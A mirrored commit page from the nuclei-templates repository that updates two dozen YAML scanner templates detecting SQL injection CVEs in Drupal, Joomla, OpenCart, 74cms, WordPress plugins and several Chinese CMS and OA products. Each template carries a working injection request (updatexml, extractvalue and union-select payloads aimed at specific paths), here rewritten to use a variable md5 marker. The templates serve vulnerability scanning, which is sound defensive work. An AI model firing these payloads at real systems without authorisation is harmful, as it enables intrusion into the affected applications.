daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #4685 from ritikchaddha/patch-91 

Update SQL templates
patch-1
Prince Chaddha 2022-06-30 14:14:48 +05:30 committed by GitHub
parent 72d3f332fa 4f913c95aa
commit e8d713412f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
24 changed files with 143 additions and 71 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
cves/2014/CVE-2014-3704.yaml
View File

@ -18,23 +18,26 @@ info:
cve-id: CVE-2014-3704
tags: cve,cve2014,drupal,sqli
variables:
num: "999999999"
requests:
- method: POST
path:
- "{{BaseURL}}/?q=node&destination=node"
body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a'
matchers-condition: and
matchers:
- type: word
words:
- "PDOException"
- '{{md5({{num}})}}'
condition: and
part: body
- type: status
status:
- 500
- type: word
words:
- "PDOException"
- "e807f1fcf82d132f9bb018ca6738a19f"
condition: and
part: body
# Enhanced by mp on 2022/02/24

7
cves/2015/CVE-2015-7297.yaml
View File

@ -13,15 +13,18 @@ info:
cve-id: CVE-2015-7297
tags: cve,cve2015,joomla,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)"
- "{{BaseURL}}/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
words:
- "cf79ae6addba60ad018347359bd144d2"
- '{{md5({{num}})}}'
part: body
# Enhanced by mp on 2022/03/02

7
cves/2017/CVE-2017-8917.yaml
View File

@ -18,15 +18,18 @@ info:
cwe-id: CWE-89
tags: cve,cve2017,joomla,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5(8888)),1)"
- "{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"
matchers:
- type: word
part: body
words:
- "cf79ae6addba60ad018347359bd144d2"
- '{{md5({{num}})}}'
# Enhanced by mp on 2022/05/11

7
cves/2018/CVE-2018-11231.yaml
View File

@ -16,13 +16,16 @@ info:
cwe-id: CWE-89
tags: cve,cve2018,opencart,sqli
variables:
num: "999999999"
requests:
- raw:
- |
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
Host: {{Hostname}}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5({{num}})),0x7e),1)"},"status":2}
redirects: true
max-redirects: 2
@ -32,7 +35,7 @@ requests:
- type: word
part: body
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
- '{{md5({{num}})}}'
- type: status
status:

10
cves/2020/CVE-2020-22208.yaml
View File

@ -15,20 +15,22 @@ info:
cve-id: CVE-2020-22210
cwe-id: CWE-89
metadata:
verified: true
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>'%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{randstr}}),9%20from%20qs_admin#"
- '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<31>%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21

9
cves/2020/CVE-2020-22209.yaml
View File

@ -16,18 +16,21 @@ info:
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{randstr}}),3%23%27"
- '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21

9
cves/2020/CVE-2020-22210.yaml
View File

@ -16,18 +16,21 @@ info:
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{randstr}}),5,6,7,8,9%23"
- '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21

9
cves/2020/CVE-2020-22211.yaml
View File

@ -16,18 +16,21 @@ info:
cwe-id: CWE-89
metadata:
fofa-query: app="74cms"
shodan-query: http.html:"Powered by 74cms"
shodan-query: http.html:"74cms"
tags: cve,cve2020,74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{randstr}}),9%23"
- '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23'
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
# Enhanced by cs on 2022/06/21

7
cves/2021/CVE-2021-24750.yaml
View File

@ -17,6 +17,9 @@ info:
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
variables:
num: "999999999"
requests:
- raw:
- |
@ -29,7 +32,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@ -38,7 +41,7 @@ requests:
- type: word
part: body
words:
- "266f89556d2b38ff067b580fb305c522"
- '{{md5({{num}})}}'
- type: status
status:

7
cves/2021/CVE-2021-31856.yaml
View File

@ -18,17 +18,20 @@ info:
cwe-id: CWE-89
tags: sqli,cve,cve2021
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0"
- "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"
matchers-condition: and
matchers:
- type: word
words:
- "709b38b27304df6257a86a60df742c4c"
- '{{md5({{num}})}}'
part: body
- type: status

5
cves/2021/CVE-2021-41691.yaml
View File

@ -13,6 +13,9 @@ info:
cve-id: CVE-2021-41691
tags: cve,cve2021,opensis,sqli,auth
variables:
num: "999999999"
requests:
- raw:
- |
@ -29,7 +32,7 @@ requests:
Origin: {{BaseURL}}
Content-Type: application/x-www-form-urlencoded
student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
student_id=updatexml(0x23,concat(1,md5({{num}})),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
attack: pitchfork
payloads:

7
cves/2022/CVE-2022-27927.yaml
View File

@ -19,10 +19,13 @@ info:
verified: "true"
tags: cve,cve2022,sqli
variables:
num: "999999999"
requests:
- raw:
- |
GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5("{{randstr}}"),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1
GET /mims/updatecustomer.php?customer_number=-1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(md5({{num}}),1,2),NULL,NULL,NULL,NULL,NULL,NULL' HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
@ -31,7 +34,7 @@ requests:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
- type: status
status:

7
cves/2022/CVE-2022-28079.yaml
View File

@ -20,6 +20,9 @@ info:
verified: "true"
tags: cve,cve2022,sqli,cms,collegemanagement
variables:
num: "999999999"
requests:
- raw:
- |
@ -27,13 +30,13 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5("{{randstr}}"),12,21),NULL,NULL,NULL,NULL#
submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#
matchers-condition: and
matchers:
- type: word
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
- type: status
status:

7
vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml
View File

@ -9,17 +9,20 @@ info:
- http://www.dedeyuan.com/xueyuan/wenti/1244.html
tags: sqli,dedecms
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'`"
- "{{BaseURL}}/member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5({{num}})+--+@`'`"
matchers-condition: and
matchers:
- type: word
words:
- "52c69e3a57331081823331c4e69d3f2e"
- '{{md5({{num}})}}'
part: body
- type: status

7
vulnerabilities/other/74cms-sqli.yaml
View File

@ -14,15 +14,18 @@ info:
cwe-id: CWE-89
tags: 74cms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a'
- '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5({{num}}))) -- a'
matchers:
- type: word
words:
- "e807f1fcf82d132f9bb018ca6738a19f"
- '{{md5({{num}})}}'
part: body
# Enhanced by ritikchaddha on 2022/05/05

13
vulnerabilities/other/duomicms-sql-injection.yaml
View File

@ -6,21 +6,24 @@ info:
severity: high
reference:
- https://redn3ck.github.io/2016/11/01/duomiCMS/
metadata:
verified: true
shodan-query: title:"DuomiCMS"
tags: duomicms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))"
- "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))"
matchers-condition: and
matchers:
- type: word
words:
- "e0ec043b3f9e198ec09041687e4d4e8d"
part: body
condition: and
- '{{md5({{num}})}}'
- type: status
status:

7
vulnerabilities/other/etouch-v2-sqli.yaml
View File

@ -9,10 +9,13 @@ info:
- https://www.anquanke.com/post/id/168991
tags: etouch,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
- "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
matchers-condition: and
matchers:
@ -22,5 +25,5 @@ requests:
- type: word
words:
- "c4ca4238a0b923820dcc509a6f75849b"
- '{{md5({{num}})}}'
part: body

7
vulnerabilities/other/finecms-sqli.yaml
View File

@ -10,12 +10,15 @@ info:
- https://blog.csdn.net/dfdhxb995397/article/details/101385340
tags: finecms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{randstr}})%27"
- '{{BaseURL}}/index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({{num}})%27'
matchers:
- type: word
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'

8
vulnerabilities/other/phpok-sqli.yaml
View File

@ -5,17 +5,21 @@ info:
author: ritikchaddha
severity: high
metadata:
verified: true
fofa-query: app="phpok"
tags: phpok,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+"
- '{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{num}}))) --+'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'

7
vulnerabilities/other/seacms-sqli.yaml
View File

@ -8,10 +8,13 @@ info:
- https://www.uedbox.com/post/54561/
tags: seacms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
redirects: true
max-redirects: 2
@ -20,7 +23,7 @@ requests:
- type: word
part: body
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
- '{{md5({{num}})}}'
- type: status
status:

17
vulnerabilities/other/wuzhicms-sqli.yaml
View File

@ -8,18 +8,21 @@ info:
- https://github.com/wuzhicms/wuzhicms/issues/184
tags: wuzhicms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20"
- "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20"
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
part: body
- type: status
status:
- 200
- type: word
words:
- "81dc9bdb52d04dc20036dbd8313ed05"
- "sql_error:MySQL Query Error"
part: body
condition: and

9
vulnerabilities/other/xdcms-sqli.yaml
View File

@ -8,6 +8,9 @@ info:
- https://www.uedbox.com/post/35188/
tags: sqli,xdcms
variables:
num: "999999999"
requests:
- method: POST
path:
@ -15,7 +18,7 @@ requests:
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+
username=dd' or extractvalue(0x0a,concat(0x0a,md5({{num}})))#&password=dd&submit=+%B5%C7+%C2%BC+
matchers-condition: and
matchers:
@ -27,10 +30,8 @@ requests:
- type: word
words:
- "707564257851522176"
- "XPATH syntax error:"
- '{{md5({{num}})}}'
part: body
condition: and
- type: status
status:

7
vulnerabilities/other/yonyou-u8-oa-sqli.yaml
View File

@ -8,17 +8,20 @@ info:
- http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: yonyou,oa,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{randstr}}))"
- '{{BaseURL}}/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{num}}))'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{{md5("{{randstr}}")}}'
- '{{md5({{num}})}}'
- type: status
status:

15
vulnerabilities/other/zcms-v3-sqli.yaml
View File

@ -8,16 +8,21 @@ info:
- https://www.anquanke.com/post/id/183241
tags: zcms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
- "{{BaseURL}}/admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5({{num}})%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b'"
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
part: body
- type: status
status:
- 200
- type: word
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
part: body